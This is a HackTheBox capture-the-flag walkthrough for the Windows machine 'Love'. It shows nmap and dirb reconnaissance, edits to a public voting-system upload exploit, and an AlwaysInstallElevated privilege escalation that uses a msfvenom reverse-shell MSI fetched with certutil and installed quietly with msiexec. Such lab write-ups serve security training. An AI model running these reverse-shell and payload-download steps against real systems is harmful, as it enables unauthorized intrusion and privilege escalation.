Hackthebox - Love

  • Windows


└─# nmap -T4 -sC -sV -O -Pn -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 20:34 EDT
Nmap scan report for love.htb (
Host is up (0.024s latency).
Not shown: 65519 closed tcp ports (reset)
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| http-cookie-flags: 
|   /: 
|_      httponly flag not set
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
| tls-alpn: 
|_  http/1.1
|_http-title: 403 Forbidden
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h41m36s, deviation: 4h02m31s, median: 21m34s
| smb2-time: 
|   date: 2022-07-17T00:59:26
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-07-16T17:59:28-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.10 seconds

Port 80

  • We can add these 2 lines to our file /etc/hosts    love.htb    www.love.htb


└─$ dirb http://www.love.htb/

DIRB v2.22    
By The Dark Raver

START_TIME: Sat Jul 16 20:54:11 2022
URL_BASE: http://www.love.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: http://www.love.htb/ ----
==> DIRECTORY: http://www.love.htb/admin/                                                                                                                                                                                                   
==> DIRECTORY: http://www.love.htb/Admin/                                                                                                                                                                                                   
==> DIRECTORY: http://www.love.htb/ADMIN/                                                                                                                                                                                                   
+ http://www.love.htb/aux (CODE:403|SIZE:302)                                                                                                                                                                                               
+ http://www.love.htb/cgi-bin/ (CODE:403|SIZE:302)                                                                                                                                                                                          
+ http://www.love.htb/com1 (CODE:403|SIZE:302)                                                                                                                                                                                              
+ http://www.love.htb/com2 (CODE:403|SIZE:302)                                                                                                                                                                                              
+ http://www.love.htb/com3 (CODE:403|SIZE:302)                                                                                                                                                                                              
+ http://www.love.htb/con (CODE:403|SIZE:302)                                                                                                                                                                                               
==> DIRECTORY: http://www.love.htb/dist/                                                                                                                                                                                                    
+ http://www.love.htb/examples (CODE:503|SIZE:402)                                                                                                                                                                                          
==> DIRECTORY: http://www.love.htb/images/                                                                                                                                                                                                  
==> DIRECTORY: http://www.love.htb/Images/                                                                                                                                                                                                  
==> DIRECTORY: http://www.love.htb/includes/                                                                                                                                                                                                
+ http://www.love.htb/index.php (CODE:200|SIZE:4388)                                                                                                                                                                                        
+ http://www.love.htb/licenses (CODE:403|SIZE:421)                                                                                                                                                                                          
+ http://www.love.htb/lpt1 (CODE:403|SIZE:302)                                                                                                                                                                                              
+ http://www.love.htb/lpt2 (CODE:403|SIZE:302)                                                                                                                                                                                              
+ http://www.love.htb/nul (CODE:403|SIZE:302)                                                                                                                                                                                               
+ http://www.love.htb/phpmyadmin (CODE:403|SIZE:302)                                                                                                                                                                                        
==> DIRECTORY: http://www.love.htb/plugins/                                                                                                                                                                                                 
+ http://www.love.htb/prn (CODE:403|SIZE:302)                                                                                                                                                                                               
+ http://www.love.htb/server-info (CODE:403|SIZE:421)                                                                                                                                                                                       
+ http://www.love.htb/server-status (CODE:403|SIZE:421)                                                                                                                                                                                     
+ http://www.love.htb/webalizer (CODE:403|SIZE:302)                                                                                                                                                                                         
---- Entering directory: http://www.love.htb/admin/ ----
+ http://www.love.htb/admin/aux (CODE:403|SIZE:302)                                                                                                                                                                                         
+ http://www.love.htb/admin/com1 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/admin/com2 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/admin/com3 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/admin/con (CODE:403|SIZE:302)                                                                                                                                                                                         
==> DIRECTORY: http://www.love.htb/admin/includes/                                                                                                                                                                                          
+ http://www.love.htb/admin/index.php (CODE:200|SIZE:6198)                                                                                                                                                                                  
+ http://www.love.htb/admin/lpt1 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/admin/lpt2 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/admin/nul (CODE:403|SIZE:302)                                                                                                                                                                                         
+ http://www.love.htb/admin/prn (CODE:403|SIZE:302)                                                                                                                                                                                         
---- Entering directory: http://www.love.htb/Admin/ ----
+ http://www.love.htb/Admin/aux (CODE:403|SIZE:302)                                                                                                                                                                                         
+ http://www.love.htb/Admin/com1 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/Admin/com2 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/Admin/com3 (CODE:403|SIZE:302)                                                                                                                                                                                        
+ http://www.love.htb/Admin/con (CODE:403|SIZE:302)                                                                                                                                                                                         
==> DIRECTORY: http://www.love.htb/Admin/includes/                                                                                                                                                                                          
END_TIME: Sat Jul 16 21:02:26 2022

Port 443

  • We get some useful info to keep aside

  • We get a new subdomain this way

Port 80

  • We can access the new subdomain through port 80

  • What if we try one of the port like 5000 (I got a forbidden when trying to access it previously)

  • In the Voters menu we can upload a file

  • If we try to execute oneliners we might need to encore our shells because it is not working as is.

  • I decided to have a look at other exploits for the voting system now that we are authenticated. And I could find this one

  • However when reading the script you will notice that the urls are not the proper one for us. Here is how to modify the begining of the script for it to work

IP = "www.love.htb" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "" # Reverse shell IP
REV_PORT = "4444" # Reverse port 
# --------------------------------

INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"
  • And of course you need to put your ip the website target. Also note that the payload is indeed encoded.


  • We can run winpeas

  • Let's try this. Here is a way to exploit the AlwaysInstalledElevated

  • msfvenom -p windows/shell_reverse_tcp lhost= lport=5555 -f msi > gabrielle.msi

  • We set our listener rlwrap nc -lvp 5555

  • We serve it with pythom

  • We get it on the target certutil.exe -urlcache -f gabrielle.msi

  • msiexec /i C:\xampp\htdocs\omrs\images\gabrielle.msi /quiet /qn /norestart

Last updated